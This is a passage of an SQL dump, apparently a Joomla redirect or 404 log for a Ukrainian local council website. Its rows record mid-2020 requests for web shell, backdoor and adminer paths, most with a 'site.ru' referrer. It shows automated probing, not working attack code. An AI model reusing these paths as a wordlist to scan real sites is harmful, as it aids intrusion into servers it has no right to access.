00:00:00',301),(35014,'https://malyn-rayrada.gov.ua/modules/pp1.php',NULL,'http://site.ru','',2,0,'2020-06-28 00:05:57','0000-00-00 00:00:00',301),(35015,'https://malyn-rayrada.gov.ua/adminer-4.7.2-mysql.php',NULL,'','',1,0,'2020-06-28 13:40:38','0000-00-00 00:00:00',301),(35016,'https://malyn-rayrada.gov.ua/logs/angal.php',NULL,'http://site.ru','',1,0,'2020-06-29 07:22:14','0000-00-00 00:00:00',301),(35017,'https://malyn-rayrada.gov.ua/media/editors/tinymce/jscripts/tiny_mce/themes/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-29 07:30:54','0000-00-00 00:00:00',301),(35018,'https://malyn-rayrada.gov.ua/kinasportswear.com/wp-catcha.php',NULL,'http://site.ru','',1,0,'2020-06-29 07:54:45','0000-00-00 00:00:00',301),(35019,'https://malyn-rayrada.gov.ua/libraries/phpinputfilter/feter.php',NULL,'http://site.ru','',1,0,'2020-06-29 08:00:07','0000-00-00 00:00:00',301),(35020,'https://malyn-rayrada.gov.ua/myshop.kinasportswear.com/wp-catcha.php',NULL,'http://site.ru','',2,0,'2020-06-29 08:00:31','0000-00-00 00:00:00',301),(35021,'https://malyn-rayrada.gov.ua/libraries/cms/layout/bag.php',NULL,'http://site.ru','',1,0,'2020-06-29 08:26:45','0000-00-00 00:00:00',301),(35022,'https://malyn-rayrada.gov.ua/libraries/phpmailer/language/popup-pomo.php',NULL,'http://site.ru','',1,0,'2020-06-29 08:27:31','0000-00-00 00:00:00',301),(35023,'https://malyn-rayrada.gov.ua/oldversionbct/ajax.php',NULL,'http://site.ru','',1,0,'2020-06-29 09:23:06','0000-00-00 00:00:00',301),(35024,'https://malyn-rayrada.gov.ua/media/old.php',NULL,'http://site.ru','',2,0,'2020-06-29 09:24:08','0000-00-00 00:00:00',301),(35025,'https://malyn-rayrada.gov.ua/libraries/joomla/template/module/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-29 10:19:09','0000-00-00 00:00:00',301),(35026,'https://malyn-rayrada.gov.ua/indeh.php',NULL,'http://site.ru','',2,0,'2020-06-29 10:23:45','0000-00-00 00:00:00',301),(35027,'https://malyn-rayrada.gov.ua/libraries/pear/archive_tar/index2.php',NULL,'http://site.ru','',1,0,'2020-06-29 10:46:30','0000-00-00 00:00:00',301),(35028,'https://malyn-rayrada.gov.ua/jorda1.php',NULL,'http://site.ru','',3,0,'2020-06-29 11:16:51','0000-00-00 00:00:00',301),(35029,'https://malyn-rayrada.gov.ua/adminer-4.7.3-mysql.php',NULL,'','',1,0,'2020-06-29 11:32:21','0000-00-00 00:00:00',301),(35030,'https://malyn-rayrada.gov.ua/oldversionbct/doc.php',NULL,'http://site.ru','',2,0,'2020-06-29 13:09:53','0000-00-00 00:00:00',301),(35031,'https://malyn-rayrada.gov.ua/layouts/joomla/edit/dz.php',NULL,'http://site.ru','',1,0,'2020-06-29 13:12:27','0000-00-00 00:00:00',301),(35032,'https://malyn-rayrada.gov.ua/os.php',NULL,'http://site.ru','',4,0,'2020-06-29 14:05:02','0000-00-00 00:00:00',301),(35033,'https://malyn-rayrada.gov.ua/media/arfat2.php',NULL,'http://site.ru','',2,0,'2020-06-29 14:07:04','0000-00-00 00:00:00',301),(35034,'https://malyn-rayrada.gov.ua/libraries/cms/language/wp-side.php',NULL,'http://site.ru','',2,0,'2020-06-29 14:34:37','0000-00-00 00:00:00',301),(35035,'https://malyn-rayrada.gov.ua/media/com_contenthistory/js/data.php',NULL,'http://site.ru','',2,0,'2020-06-29 15:00:37','0000-00-00 00:00:00',301),(35036,'https://malyn-rayrada.gov.ua/media/system/wp.php',NULL,'http://site.ru','',3,0,'2020-06-29 15:29:54','0000-00-00 00:00:00',301),(35037,'https://malyn-rayrada.gov.ua/nsgin.com/blackhat.php',NULL,'http://site.ru','',1,0,'2020-06-29 17:57:59','0000-00-00 00:00:00',301),(35038,'https://malyn-rayrada.gov.ua/media/com_contact/js/data.php',NULL,'http://site.ru','',1,0,'2020-06-29 18:02:42','0000-00-00 00:00:00',301),(35039,'https://malyn-rayrada.gov.ua/nsgin.com/cache/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-29 18:52:46','0000-00-00 00:00:00',301),(35040,'https://malyn-rayrada.gov.ua/includes/tp4hh42p.php',NULL,'http://site.ru','',1,0,'2020-06-29 19:17:36','0000-00-00 00:00:00',301),(35041,'https://malyn-rayrada.gov.ua/logs/a99.php',NULL,'http://site.ru','',2,0,'2020-06-29 20:16:12','0000-00-00 00:00:00',301),(35042,'https://malyn-rayrada.gov.ua/nsgin.com/wp-plugins.php',NULL,'http://site.ru','',1,0,'2020-06-29 20:44:29','0000-00-00 00:00:00',301),(35043,'https://malyn-rayrada.gov.ua/includes/wp-aespa.php',NULL,'http://site.ru','',2,0,'2020-06-30 02:03:59','0000-00-00 00:00:00',301),(35044,'https://malyn-rayrada.gov.ua/libraries/joomla/template/k.php',NULL,'http://site.ru','',5,0,'2020-06-30 02:57:28','0000-00-00 00:00:00',301),(35045,'https://malyn-rayrada.gov.ua/media/media/css/sec.php',NULL,'http://site.ru','',1,0,'2020-06-30 03:26:31','0000-00-00 00:00:00',301),(35046,'https://malyn-rayrada.gov.ua/lkunge.php',NULL,'http://site.ru','',1,0,'2020-06-30 03:53:30','0000-00-00 00:00:00',301),(35047,'https://malyn-rayrada.gov.ua/media/system/media.php',NULL,'http://site.ru','',1,0,'2020-06-30 04:01:39','0000-00-00 00:00:00',301),(35048,'https://malyn-rayrada.gov.ua/layouts/doc.php',NULL,'http://site.ru','',2,0,'2020-06-30 04:20:46','0000-00-00 00:00:00',301),(35049,'https://malyn-rayrada.gov.ua/libraries/joomla/template/module/modifier/hell.php',NULL,'http://site.ru','',2,0,'2020-06-30 04:50:23','0000-00-00 00:00:00',301),(35050,'https://malyn-rayrada.gov.ua/mod/includes/plugins/infossagradas/includes.php',NULL,'http://site.ru','',2,0,'2020-06-30 05:48:52','0000-00-00 00:00:00',301),(35051,'https://malyn-rayrada.gov.ua/libraries/phpinputfilter/hell.php',NULL,'http://site.ru','',5,0,'2020-06-30 07:30:30','0000-00-00 00:00:00',301),(35052,'https://malyn-rayrada.gov.ua/includes/search.class.php',NULL,'http://site.ru','',1,0,'2020-06-30 07:32:38','0000-00-00 00:00:00',301),(35053,'https://malyn-rayrada.gov.ua/mode.php',NULL,'http://site.ru','',2,0,'2020-06-30 08:25:34','0000-00-00 00:00:00',301),(35054,'https://malyn-rayrada.gov.ua/media/editors/tinymce/plugins/save/data.php',NULL,'http://site.ru','',1,0,'2020-06-30 08:48:23','0000-00-00 00:00:00',301),(35055,'https://malyn-rayrada.gov.ua/local.php',NULL,'http://site.ru','',2,0,'2020-06-30 08:54:25','0000-00-00 00:00:00',301),(35056,'https://malyn-rayrada.gov.ua/adminer-4.7.4-mysql.php',NULL,'','',1,0,'2020-06-30 09:34:27','0000-00-00 00:00:00',301),(35057,'https://malyn-rayrada.gov.ua/libraries/cms/captcha/data.php',NULL,'http://site.ru','',2,0,'2020-06-30 10:11:39','0000-00-00 00:00:00',301),(35058,'https://malyn-rayrada.gov.ua/libraries/pattemplate/.h..php',NULL,'http://site.ru','',1,0,'2020-06-30 10:35:08','0000-00-00 00:00:00',301),(35059,'https://malyn-rayrada.gov.ua/media/cms/css/shell.php',NULL,'http://site.ru','',2,0,'2020-06-30 11:25:07','0000-00-00 00:00:00',301),(35060,'https://malyn-rayrada.gov.ua/libraries/data.php',NULL,'http://site.ru','',2,0,'2020-06-30 11:57:13','0000-00-00 00:00:00',301),(35061,'https://malyn-rayrada.gov.ua/libraries/joomla/template/module/modifier/feal.php',NULL,'http://site.ru','',1,0,'2020-06-30 13:12:42','0000-00-00 00:00:00',301),(35062,'https://malyn-rayrada.gov.ua/media/wp-type.php',NULL,'http://site.ru','',1,0,'2020-06-30 13:44:16','0000-00-00 00:00:00',301),(35063,'https://malyn-rayrada.gov.ua/log/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-30 15:15:46','0000-00-00 00:00:00',301),(35064,'https://malyn-rayrada.gov.ua/libraries/joomla/template/module/modifier/feter.php',NULL,'http://site.ru','',3,0,'2020-06-30 15:40:45','0000-00-00 00:00:00',301),(35065,'https://malyn-rayrada.gov.ua/layouts/joomla/system/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-30 16:28:41','0000-00-00 00:00:00',301),(35066,'https://malyn-rayrada.gov.ua/libraries/0p0b8xpt.php',NULL,'http://site.ru','',3,0,'2020-06-30 16:31:28','0000-00-00 00:00:00',301),(35067,'https://malyn-rayrada.gov.ua/libraries/f0f/integration/joomla/wp-blog.php',NULL,'http://site.ru','',2,0,'2020-06-30 17:24:44','0000-00-00 00:00:00',301),(35068,'https://malyn-rayrada.gov.ua/lpeziy.php',NULL,'http://site.ru','',2,0,'2020-06-30 17:56:30','0000-00-00 00:00:00',301),(35069,'https://malyn-rayrada.gov.ua/language/admin.php',NULL,'http://site.ru','',1,0,'2020-06-30 17:58:43','0000-00-00 00:00:00',301),(35070,'https://malyn-rayrada.gov.ua/payu-php-sdk/combo.php',NULL,'http://site.ru','',2,0,'2020-06-30 19:14:32','0000-00-00 00:00:00',301),(35071,'https://malyn-rayrada.gov.ua/attachments/article/2409/питання',NULL,'','',1,0,'2020-06-30 19:23:52','0000-00-00 00:00:00',301),(35072,'https://malyn-rayrada.gov.ua/libraries/cms/form/data.php',NULL,'http://site.ru','',1,0,'2020-06-30 19:48:11','0000-00-00 00:00:00',301),(35073,'https://malyn-rayrada.gov.ua/kdbzap.php',NULL,'http://site.ru','',1,0,'2020-06-30 21:00:19','0000-00-00 00:00:00',301),(35074,'https://malyn-rayrada.gov.ua/libraries/domit/wp-logos.php',NULL,'http://site.ru','',1,0,'2020-06-30 21:29:40','0000-00-00 00:00:00',301),(35075,'https://malyn-rayrada.gov.ua/media/cred.php',NULL,'http://site.ru','',2,0,'2020-06-30 22:18:13','0000-00-00 00:00:00',301),(35076,'https://malyn-rayrada.gov.ua/libraries/joomla/template/popup-pompop.php',NULL,'http://site.ru','',2,0,'2020-07-01 00:39:41','0000-00-00 00:00:00',301),(35077,'https://malyn-rayrada.gov.ua/modules/go.php',NULL,'http://site.ru','',2,0,'2020-07-01 01:08:23','0000-00-00 00:00:00',301),(35078,'https://malyn-rayrada.gov.ua/libraries/phpmailer/language/content-post.php',NULL,'http://site.ru','',2,0,'2020-07-01 01:51:22','0000-00-00 00:00:00',301),(35079,'https://malyn-rayrada.gov.ua/newsletter.kinasportswear.com/wp-catcha.php',NULL,'http://site.ru','',2,0,'2020-07-01 02:52:28','0000-00-00 00:00:00',301),(35080,'https://malyn-rayrada.gov.ua/libraries/cms/help/data.php',NULL,'http://site.ru','',1,0,'2020-07-01 03:48:04','0000-00-00 00:00:00',301),(35081,'https://malyn-rayrada.gov.ua/kopia/en/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/folders.php',NULL,'http://site.ru','',1,0,'2020-07-01 04:22:25','0000-00-00 00:00:00',301),(35082,'https://malyn-rayrada.gov.ua/includes/wp-type.php',NULL,'http://site.ru','',4,0,'2020-07-01 04:49:07','0000-00-00 00:00:00',301),(35083,'https://malyn-rayrada.gov.ua/libraries/cms/form/beautifu.php',NULL,'http://site.ru','',2,0,'2020-07-01 05:18:23','0000-00-00 00:00:00',301),(35084,'https://malyn-rayrada.gov.ua/language/dcomay.php',NULL,'http://site.ru','',1,0,'2020-07-01 06:08:38','0000-00-00 00:00:00',301),(35085,'https://malyn-rayrada.gov.ua/options/content-post.php',NULL,'http://site.ru','',2,0,'2020-07-01 06:48:55','0000-00-00 00:00:00',301),(35086,'https://malyn-rayrada.gov.ua/libraries/cms/schema/changeitem/data.php',NULL,'http://site.ru','',7,0,'2020-07-01 07:09:51','0000-00-00 00:00:00',301),(35087,'https://malyn-rayrada.gov.ua/adminer-4.7.5-mysql.php',NULL,'','',1,0,'2020-07-01 07:17:09','0000-00-00 00:00:00',301),(35088,'https://malyn-rayrada.gov.ua/old/aaction.php',NULL,'http://site.ru','',1,0,'2020-07-01 07:36:51','0000-00-00 00:00:00',301),(35089,'https://malyn-rayrada.gov.ua/libraries/phpmailer/index.htmly.php',NULL,'http://site.ru','',4,0,'2020-07-01 08:18:46','0000-00-00 00:00:00',301),(35090,'https://malyn-rayrada.gov.ua/libraries/phputf8/utils/wp-side.php',NULL,'http://site.ru','',2,0,'2020-07-01 08:21:44','0000-00-00 00:00:00',301),(35091,'https://malyn-rayrada.gov.ua/jquery-validation/combo.php',NULL,'http://site.ru','',2,0,'2020-07-01 09:41:01','0000-00-00 00:00:00',301),(35092,'https://malyn-rayrada.gov.ua/kopia/pl/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/folders.php',NULL,'http://site.ru','',2,0,'2020-07-01 09:41:36','0000-00-00 00:00:00',301),(35093,'https://malyn-rayrada.gov.ua/nsgin.com/cache/wp-plugins.php',NULL,'http://site.ru','',1,0,'2020-07-01 10:59:22','0000-00-00 00:00:00',301),(35094,'https://malyn-rayrada.gov.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/directionality/feter.php',NULL,'http://site.ru','',2,0,'2020-07-01 12:53:06','0000-00-00 00:00:00',301),(35095,'https://malyn-rayrada.gov.ua/cache/zr.php',NULL,'http://site.ru','',2,0,'2020-07-01 16:51:24','0000-00-00 00:00:00',301),(35096,'https://malyn-rayrada.gov.ua/images/errors.php',NULL,'http://site.ru','',2,0,'2020-07-01 16:52:59','0000-00-00 00:00:00',301),(35097,'https://malyn-rayrada.gov.ua/homefeatured/popup-pomo.php',NULL,'http://site.ru','',2,0,'2020-07-01 17:12:03','0000-00-00 00:00:00',301),(35098,'https://malyn-rayrada.gov.ua/components/com_media/helpers/ehelp.php',NULL,'http://site.ru','',2,0,'2020-07-01 17:19:25','0000-00-00 00:00:00',301),(35099,'https://malyn-rayrada.gov.ua/images/xsec.php',NULL,'http://site.ru','',2,0,'2020-07-01 17:19:30','0000-00-00 00:00:00',301),(35100,'https://malyn-rayrada.gov.ua/.haccess.php',NULL,'http://site.ru','',4,0,'2020-07-01 17:41:06','0000-00-00 00:00:00',301),(35101,'https://malyn-rayrada.gov.ua/components/com_foxcontact/.inc.php',NULL,'http://site.ru','',2,0,'2020-07-01 17:41:26','0000-00-00 00:00:00',301),(35102,'https://malyn-rayrada.gov.ua/components/com_content/views/archive/ypma90z.php',NULL,'http://site.ru','',1,0,'2020-07-01 17:41:51','0000-00-00 00:00:00',301),(35103,'https://malyn-rayrada.gov.ua/images/-.php',NULL,'http://site.ru','',2,0,'2020-07-01 18:03:45','0000-00-00 00:00:00',301),(35104,'https://malyn-rayrada.gov.ua/templates/rhuk_milkyway/html/editor.php',NULL,'http://site.ru','',2,0,'2020-07-01 18:05:22','0000-00-00 00:00:00',301),(35105,'https://malyn-rayrada.gov.ua/cache/zeroshell.php',NULL,'http://site.ru','',1,0,'2020-07-01 18:10:31','0000-00-00 00:00:00',301),(35106,'https://malyn-rayrada.gov.ua/back/templates/protostar/doc.php',NULL,'http://site.ru','',2,0,'2020-07-01 18:11:00','0000-00-00 00:00:00',301),(35107,'https://malyn-rayrada.gov.ua/templates/beez3/doc.php',NULL,'http://site.ru','',2,0,'2020-07-01 18:13:20','0000-00-00 00:00:00',301),(35108,'https://malyn-rayrada.gov.ua/revisiona/popup-pomo.php',NULL,'http://site.ru','',2,0,'2020-07-01 18:52:37','0000-00-00 00:00:00',301),(35109,'https://malyn-rayrada.gov.ua/cache/lyonc.php',NULL,'http://site.ru','',1,0,'2020-07-01 19:01:04','0000-00-00 00:00:00',301),(35110,'https://malyn-rayrada.gov.ua/components/com_docman/views/tree/config.php',NULL,'http://site.ru','',1,0,'2020-07-01 19:19:43','0000-00-00 00:00:00',301),(35111,'https://malyn-rayrada.gov.ua/xmlrpc/includes/includes.php',NULL,'http://site.ru','',3,0,'2020-07-01 19:21:11','0000-00-00 00:00:00',301),(35112,'https://malyn-rayrada.gov.ua/cache/auto.php',NULL,'http://site.ru','',2,0,'2020-07-01 19:21:16','0000-00-00 00:00:00',301),(35113,'https://malyn-rayrada.gov.ua/images/eventlist/theme.php',NULL,'http://site.ru','',2,0,'2020-07-01 19:22:50','0000-00-00 00:00:00',301),(35114,'https://malyn-rayrada.gov.ua/wp-blog.php',NULL,'http://site.ru','',2,0,'2020-07-01 19:48:59','0000-00-00 00:00:00',301),(35115,'https://malyn-rayrada.gov.ua/cli/1.php',NULL,'http://site.ru','',1,0,'2020-07-01 19:59:15','0000-00-00 00:00:00',301),(35116,'https://malyn-rayrada.gov.ua/plugins/system/jsnframework/libraries/joomlashine/config/htaccess.php',NULL,'http://site.ru','',2,0,'2020-07-01 20:15:16','0000-00-00 00:00:00',301),(35117,'https://malyn-rayrada.gov.ua/templates/beez3/a17.php',NULL,'http://site.ru','',3,0,'2020-07-01 20:38:43','0000-00-00 00:00:00',301),(35118,'https://malyn-rayrada.gov.ua/libraries/joomla/base/date.php',NULL,'http://site.ru','',1,0,'2020-07-01 20:41:47','0000-00-00 00:00:00',301),(35119,'https://malyn-rayrada.gov.ua/components/com_foxcontact/uploads/backup.php',NULL,'http://site.ru','',2,0,'2020-07-01 20:44:43','0000-00-00 00:00:00',301),(35120,'https://malyn-rayrada.gov.ua/components/com_content/helpers/images.php',NULL,'http://site.ru','',1,0,'2020-07-01 21:03:31','0000-00-00 00:00:00',301),(35121,'https://malyn-rayrada.gov.ua/rzzmun.php',NULL,'http://site.ru','',2,0,'2020-07-01 21:28:00','0000-00-00 00:00:00',301),(35122,'https://malyn-rayrada.gov.ua/components/com_easyblog/views/blogger/tmpl/wp-block.php',NULL,'http://site.ru','',1,0,'2020-07-01 21:29:32','0000-00-00 00:00:00',301),(35123,'https://malyn-rayrada.gov.ua/images/articles/cc.php',NULL,'http://site.ru','',2,0,'2020-07-01 21:55:36','0000-00-00 00:00:00',301),(35124,'https://malyn-rayrada.gov.ua/images/ict.php',NULL,'http://site.ru','',2,0,'2020-07-01 22:19:44','0000-00-00 00:00:00',301),(35125,'https://malyn-rayrada.gov.ua/images/ddd.php',NULL,'http://site.ru','',2,0,'2020-07-01 22:20:15','0000-00-00 00:00:00',301),(35126,'https://malyn-rayrada.gov.ua/plugins/system/helix3/core/configure.php',NULL,'http://site.ru','',5,0,'2020-07-01 22:20:32','0000-00-00 00:00:00',301),(35127,'https://malyn-rayrada.gov.ua/inbex.php',NULL,'http://site.ru','',2,0,'2020-07-01 22:44:53','0000-00-00 00:00:00',301),(35128,'https://malyn-rayrada.gov.ua/test2.php',NULL,'http://site.ru','',2,0,'2020-07-01 22:45:42','0000-00-00 00:00:00',301),(35129,'https://malyn-rayrada.gov.ua/delete/default.php',NULL,'http://site.ru','',1,0,'2020-07-01 22:46:21','0000-00-00 00:00:00',301),(35130,'https://malyn-rayrada.gov.ua/templates/ambient/images/multibox/streamed.php',NULL,'http://site.ru','',1,0,'2020-07-01 22:53:22','0000-00-00 00:00:00',301),(35131,'https://malyn-rayrada.gov.ua/components/com_contact/views/featured/tmpl/.hello.php',NULL,'http://site.ru','',1,0,'2020-07-01 23:06:21','0000-00-00 00:00:00',301),(35132,'https://malyn-rayrada.gov.ua/bin/corecore71.php',NULL,'http://site.ru','',3,0,'2020-07-01 23:08:13','0000-00-00 00:00:00',301),(35133,'https://malyn-rayrada.gov.ua/components/com_jooomlas/xyxz.php',NULL,'http://site.ru','',1,0,'2020-07-01 23:08:53','0000-00-00 00:00:00',301),(35134,'https://malyn-rayrada.gov.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/langs/feter.php',NULL,'http://site.ru','',2,0,'2020-07-01 23:12:17','0000-00-00 00:00:00',301),(35135,'https://malyn-rayrada.gov.ua/greens.php',NULL,'http://site.ru','',1,0,'2020-07-01 23:34:07','0000-00-00 00:00:00',301),(35136,'https://malyn-rayrada.gov.ua/csv/cez.php',NULL,'http://site.ru','',3,0,'2020-07-01 23:35:23','0000-00-00 00:00:00',301),(35137,'https://malyn-rayrada.gov.ua/cache/root.php',NULL,'http://site.ru','',2,0,'2020-07-01 23:36:04','0000-00-00 00:00:00',301),(35138,'https://malyn-rayrada.gov.ua/cache/accesson.php',NULL,'https://malyn-rayrada.gov.ua/cache/accesson1.php','',1,0,'2020-07-01 23:44:54','0000-00-00 00:00:00',301),(35139,'https://malyn-rayrada.gov.ua/templates/beez3/html/mod_login/gank.php.php',NULL,'http://site.ru','',2,0,'2020-07-01 23:53:18','0000-00-00 00:00:00',301),(35140,'https://malyn-rayrada.gov.ua/bin/incengine42.php',NULL,'http://site.ru','',1,0,'2020-07-01 23:58:39','0000-00-00 00:00:00',301),(35141,'https://malyn-rayrada.gov.ua/assets/assetsu.php',NULL,'http://site.ru','',1,0,'2020-07-02 00:00:14','0000-00-00 00:00:00',301),(35142,'https://malyn-rayrada.gov.ua/images/wp-te.php',NULL,'http://site.ru','',3,0,'2020-07-02 00:01:00','0000-00-00 00:00:00',301),(35143,'https://malyn-rayrada.gov.ua/images/nyty/theme.php',NULL,'http://site.ru','',2,0,'2020-07-02 00:03:18','0000-00-00 00:00:00',301),(35144,'https://malyn-rayrada.gov.ua/templates/ambient/js/wp-side.php',NULL,'http://site.ru','',2,0,'2020-07-02 00:04:33','0000-00-00 00:00:00',301),(35145,'https://malyn-rayrada.gov.ua/tmp/install_5eb717fa1faba/mod_slidethemall_joomla3/doc.php',NULL,'http://site.ru','',2,0,'2020-07-02 00:47:33','0000-00-00 00:00:00',301),(35146,'https://malyn-rayrada.gov.ua/components/com_jce/editor/tiny_mce/themes/none/htaccess.php',NULL,'http://site.ru','',1,0,'2020-07-02 00:47:35','0000-00-00 00:00:00',301),(35147,'https://malyn-rayrada.gov.ua/plugins/system/jsnframework/assets/3rd-party/jquery-zeroclipboard/htaccess.php',NULL,'http://site.ru','',1,0,'2020-07-02 00:48:46','0000-00-00 00:00:00',301),(35148,'https://malyn-rayrada.gov.ua/tmp/install_505b916e48aa2/el-gr/apps/page/language/wp-update.php',NULL,'http://site.ru','',1,0,'2020-07-02 00:49:51','0000-00-00 00:00:00',301),(35149,'https://malyn-rayrada.gov.ua/images/nyty/images.php',NULL,'http://site.ru','',1,0,'2020-07-02 01:15:03','0000-00-00 00:00:00',301),(35150,'https://malyn-rayrada.gov.ua/images/stories/images.php',NULL,'http://site.ru','',2,0,'2020-07-02 01:15:55','0000-00-00 00:00:00',301),(35151,'https://malyn-rayrada.gov.ua/components/com_search/models/index2.php',NULL,'http://site.ru','',1,0,'2020-07-02 01:23:29','0000-00-00 00:00:00',301),(35152,'https://malyn-rayrada.gov.ua/libraries/fof/utils/installscript/wp-side.php',NULL,'http://site.ru','',1,0,'2020-07-02 01:35:45','0000-00-00 00:00:00',301),(35153,'https://malyn-rayrada.gov.ua/fprww1.php',NULL,'http://site.ru','',1,0,'2020-07-02 01:39:04','0000-00-00 00:00:00',301),(35154,'https://malyn-rayrada.gov.ua/libraries/fof/utils/installscript/feal.php',NULL,'http://site.ru','',1,0,'2020-07-02 02:03:18','0000-00-00 00:00:00',301),(35155,'https://malyn-rayrada.gov.ua/templates/ambient/css/ionicons/5e39617b826c6.php',NULL,'http://site.ru','',1,0,'2020-07-02 02:08:53','0000-00-00 00:00:00',301),(35156,'https://malyn-rayrada.gov.ua/libraries/joomla/base/ganks.php.php',NULL,'http://site.ru','',2,0,'2020-07-02 02:09:42','0000-00-00 00:00:00',301),(35157,'https://malyn-rayrada.gov.ua/weqqglgwwd.php',NULL,'http://site.ru','',1,0,'2020-07-02 02:50:14','0000-00-00 00:00:00',301),(35158,'https://malyn-rayrada.gov.ua/_media/sitemps.php',NULL,'http://site.ru','',2,0,'2020-07-02 02:52:05','0000-00-00 00:00:00',301),(35159,'https://malyn-rayrada.gov.ua/images/log.php',NULL,'http://site.ru','',1,0,'2020-07-02 02:53:38','0000-00-00 00:00:00',301),(35160,'https://malyn-rayrada.gov.ua/xnx.php',NULL,'http://site.ru','',1,0,'2020-07-02 02:55:10','0000-00-00 00:00:00',301),(35161,'https://malyn-rayrada.gov.ua/components/com_foxcontact/ok.php',NULL,'http://site.ru','',2,0,'2020-07-02 02:57:42','0000-00-00 00:00:00',301),(35162,'https://malyn-rayrada.gov.ua/images/mainsite-banner/licensed.php',NULL,'http://site.ru','',7,0,'2020-07-02 03:20:40','0000-00-00 00:00:00',301),(35163,'https://malyn-rayrada.gov.ua/test/maint/popup-pomo.php',NULL,'http://site.ru','',3,0,'2020-07-02 03:21:13','0000-00-00 00:00:00',301),(35164,'https://malyn-rayrada.gov.ua/t9lbiw.php',NULL,'http://site.ru','',2,0,'2020-07-02 03:43:24','0000-00-00 00:00:00',301),(35165,'https://malyn-rayrada.gov.ua/cache/index1.php',NULL,'http://site.ru','',1,0,'2020-07-02 03:43:46','0000-00-00 00:00:00',301),(35166,'https://malyn-rayrada.gov.ua/components/com_foxcontact/c.php',NULL,'http://site.ru','',1,0,'2020-07-02 03:44:00','0000-00-00 00:00:00',301),(35167,'https://malyn-rayrada.gov.ua/components/com_search/models/sad.php',NULL,'http://site.ru','',1,0,'2020-07-02 04:15:36','0000-00-00 00:00:00',301),(35168,'https://malyn-rayrada.gov.ua/plugins1/system/legacy/feter.php',NULL,'http://site.ru','',3,0,'2020-07-02 04:32:32','0000-00-00 00:00:00',301),(35169,'https://malyn-rayrada.gov.ua/components/com_content/controllers/green.php',NULL,'http://site.ru','',3,0,'2020-07-02 04:34:56','0000-00-00 00:00:00',301),(35170,'https://malyn-rayrada.gov.ua/wkntqx.php',NULL,'http://site.ru','',3,0,'2020-07-02 04:37:48','0000-00-00 00:00:00',301),(35171,'https://malyn-rayrada.gov.ua/adminer-4.7.6-mysql.php',NULL,'','',1,0,'2020-07-02 04:46:48','0000-00-00 00:00:00',301),(35172,'https://malyn-rayrada.gov.ua/32pone.php',NULL,'http://site.ru','',1,0,'2020-07-02 04:57:11','0000-00-00 00:00:00',301),(35173,'https://malyn-rayrada.gov.ua/components/com_contenthistory/wrapper.php',NULL,'http://site.ru','',2,0,'2020-07-02 04:59:43','0000-00-00 00:00:00',301),(35174,'https://malyn-rayrada.gov.ua/tnvgoyekbr.php',NULL,'http://site.ru','',1,0,'2020-07-02 05:00:50','0000-00-00 00:00:00',301),(35175,'https://malyn-rayrada.gov.ua/templates/protostar/doc.php',NULL,'http://site.ru','',2,0,'2020-07-02 05:22:00','0000-00-00 00:00:00',301),(35176,'https://malyn-rayrada.gov.ua/tmp/s.php',NULL,'http://site.ru','',2,0,'2020-07-02 05:25:23','0000-00-00 00:00:00',301),(35177,'https://malyn-rayrada.gov.ua/blog/xml.php',NULL,'http://site.ru','',2,0,'2020-07-02 05:25:55','0000-00-00 00:00:00',301),(35178,'https://malyn-rayrada.gov.ua/components/com_wrapper/ganks.php.php',NULL,'http://site.ru','',2,0,'2020-07-02 05:26:54','0000-00-00 00:00:00',301),(35179,'https://malyn-rayrada.gov.ua/images/ww-te.php',NULL,'http://site.ru','',1,0,'2020-07-02 05:38:07','0000-00-00 00:00:00',301),(35180,'https://malyn-rayrada.gov.ua/components/com_layer_slider/base/static/layerslider/plugins/wp-update.php',NULL,'http://site.ru','',4,0,'2020-07-02 05:49:19','0000-00-00 00:00:00',301),(35181,'https://malyn-rayrada.gov.ua/components/com_content/views/archive/beastwso-icq-744324366.php',NULL,'http://site.ru','',2,0,'2020-07-02 05:50:57','0000-00-00 00:00:00',301),(35182,'https://malyn-rayrada.gov.ua/zb.php',NULL,'http://site.ru','',2,0,'2020-07-02 05:50:59','0000-00-00 00:00:00',301),(35183,'https://malyn-rayrada.gov.ua/templates/ambient/js/jquery/1.php',NULL,'http://site.ru','',1,0,'2020-07-02 05:51:25','0000-00-00 00:00:00',301),(35184,'https://malyn-rayrada.gov.ua/images/ws0.php',NULL,'http://site.ru','',1,0,'2020-07-02 05:52:04','0000-00-00 00:00:00',301),(35185,'https://malyn-rayrada.gov.ua/lonteku.php',NULL,'http://site.ru','',1,0,'2020-07-02 06:11:05','0000-00-00 00:00:00',301),(35186,'https://malyn-rayrada.gov.ua/plugins/system/debug/deep.php',NULL,'http://site.ru','',1,0,'2020-07-02 06:16:07','0000-00-00 00:00:00',301),(35187,'https://malyn-rayrada.gov.ua/qm0dec.php',NULL,'http://site.ru','',2,0,'2020-07-02 06:18:31','0000-00-00 00:00:00',301),(35188,'https://malyn-rayrada.gov.ua/urbanconcept.rw/wp-catcha.php',NULL,'http://site.ru','',2,0,'2020-07-02 06:36:22','0000-00-00 00:00:00',301),(35189,'https://malyn-rayrada.gov.ua/components/com_jce/editor/tiny_mce/plugins/preview/htaccess.php',NULL,'http://site.ru','',2,0,'2020-07-02 06:38:31','0000-00-00 00:00:00',301),(35190,'https://malyn-rayrada.gov.ua/templates/ambient/css/font-awesome/bag.php',NULL,'http://site.ru','',1,0,'2020-07-02 07:11:35','0000-00-00 00:00:00',301),(35191,'https://malyn-rayrada.gov.ua/templates/beez3/css/theme.php',NULL,'http://site.ru','',5,0,'2020-07-02 07:29:02','0000-00-00 00:00:00',301),(35192,'https://malyn-rayrada.gov.ua/templates/beez3/home.php',NULL,'http://site.ru','',2,0,'2020-07-02 07:30:37','0000-00-00 00:00:00',301),(35193,'https://malyn-rayrada.gov.ua/rcoiqa.php',NULL,'http://site.ru','',1,0,'2020-07-02 07:54:54','0000-00-00 00:00:00',301),(35194,'https://malyn-rayrada.gov.ua/templates/beez3/html/com_content/article/data.php',NULL,'http://site.ru','',1,0,'2020-07-02 07:55:21','0000-00-00 00:00:00',301),(35195,'https://malyn-rayrada.gov.ua/libraries/fof/toolbar/feal.php',NULL,'http://site.ru','',2,0,'2020-07-02 07:56:51','0000-00-00 